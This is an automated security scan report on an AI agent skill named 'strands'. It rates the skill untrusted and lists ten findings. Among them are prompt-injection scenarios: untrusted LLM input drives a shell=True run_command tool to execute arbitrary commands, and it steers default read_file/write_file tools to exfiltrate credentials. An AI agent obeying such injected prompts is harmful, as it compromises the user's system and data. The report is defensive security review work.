Trust Assessment
strands received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 10 findings: 2 critical, 4 high, 4 medium, and 0 low severity. Key findings include Arbitrary command execution, Unsafe deserialization / dynamic eval, Dangerous call: __import__().
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 26/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings10
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/trippingkelsea/aws-strands/scripts/create-agent.py:87 | |
| CRITICAL | Arbitrary Python Code Execution via `run-agent.py` The `scripts/run-agent.py` script loads and executes an arbitrary Python file specified as a command-line argument using `importlib.util.spec_from_file_location` and `spec.loader.exec_module`. An attacker who can control the `agent-file.py` path can execute any Python code on the host system, leading to arbitrary code execution and full system compromise. Do not allow execution of arbitrary Python files from untrusted sources. If the script is intended for development, clearly warn users about the risks. Consider sandboxing the execution environment or restricting the source of agent files to a trusted repository. | LLM | scripts/run-agent.py:20 | |
| HIGH | Unsafe deserialization / dynamic eval Python builtins/import manipulation Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/trippingkelsea/aws-strands/tests/test_imports.py:102 | |
| HIGH | Dangerous call: __import__() Call to '__import__()' detected in function 'test_experimental_imports'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/trippingkelsea/aws-strands/tests/test_imports.py:102 | |
| HIGH | Command Injection Vulnerability in Generated `run_command` Tool The `scripts/create-agent.py` script generates new agent projects that include a `run_command` tool. This tool executes shell commands using `subprocess.run(command, shell=True, ...)`. If the `command` argument to this tool is influenced by untrusted LLM output (e.g., from a user prompt), an attacker can inject arbitrary shell commands, leading to remote code execution, data exfiltration, or system compromise. The `shell=True` argument exacerbates this risk by allowing shell features like piping and command chaining. Avoid using `shell=True` with `subprocess.run` when executing commands derived from untrusted input. Instead, pass commands as a list of arguments (`shell=False`) and explicitly sanitize or whitelist commands and arguments. Provide a clear warning about the dangers of enabling such a tool for agents exposed to untrusted input. | LLM | scripts/create-agent.py:70 | |
| HIGH | Excessive Permissions and Data Exfiltration via Default `read_file` and `write_file` Tools in Generated Agents Agents generated by `scripts/create-agent.py` include `read_file` and `write_file` tools by default. These tools allow the agent to read and write arbitrary files on the filesystem. If an agent is exposed to untrusted input, a malicious prompt could instruct the agent to read sensitive files (e.g., credentials, configuration, private keys) or write malicious content to system paths, leading to data exfiltration, privilege escalation, or system compromise. Do not include broad filesystem access tools (`read_file`, `write_file`) by default in agents intended for production or untrusted environments. If necessary, restrict file paths to a safe sandbox or require explicit user confirmation for sensitive operations. | LLM | scripts/create-agent.py:48 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/trippingkelsea/aws-strands/tests/test_imports.py:159 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/trippingkelsea/aws-strands/tests/test_imports.py:168 | |
| MEDIUM | Built-in `shell` and `python_repl` Tools Grant Arbitrary Execution The `SKILL.md` documentation explicitly lists `shell` and `python_repl` as built-in tools available in `strands-agents-tools`. When enabled, these tools allow the agent to execute arbitrary shell commands and Python code, respectively. While powerful, enabling these tools for an agent exposed to untrusted input creates a severe command injection and arbitrary code execution risk. Provide clear warnings about the security implications of enabling `shell` and `python_repl` tools. Advise users to only enable them in trusted, sandboxed environments or with strict input validation and access controls. | LLM | SKILL.md:149 | |
| MEDIUM | Unpinned External Binary Execution in MCPClient Example The `SKILL.md` documentation provides an example for `MCPClient` integration that executes an external binary `uvx` with `command="uvx", args=["some-mcp-server@latest"]`. Relying on `@latest` for an external binary without pinning a specific version introduces a supply chain risk. If `uvx` or `some-mcp-server` is compromised or a malicious version is published, the agent could execute arbitrary malicious code. Pin the version of `uvx` and `some-mcp-server` to a known good version (e.g., `some-mcp-server@1.2.3`) to mitigate risks from malicious updates. Implement integrity checks for external binaries. | LLM | SKILL.md:199 |
Scan History
Embed Code
[](https://skillshield.io/report/33339ea5125fe0b9)
Powered by SkillShield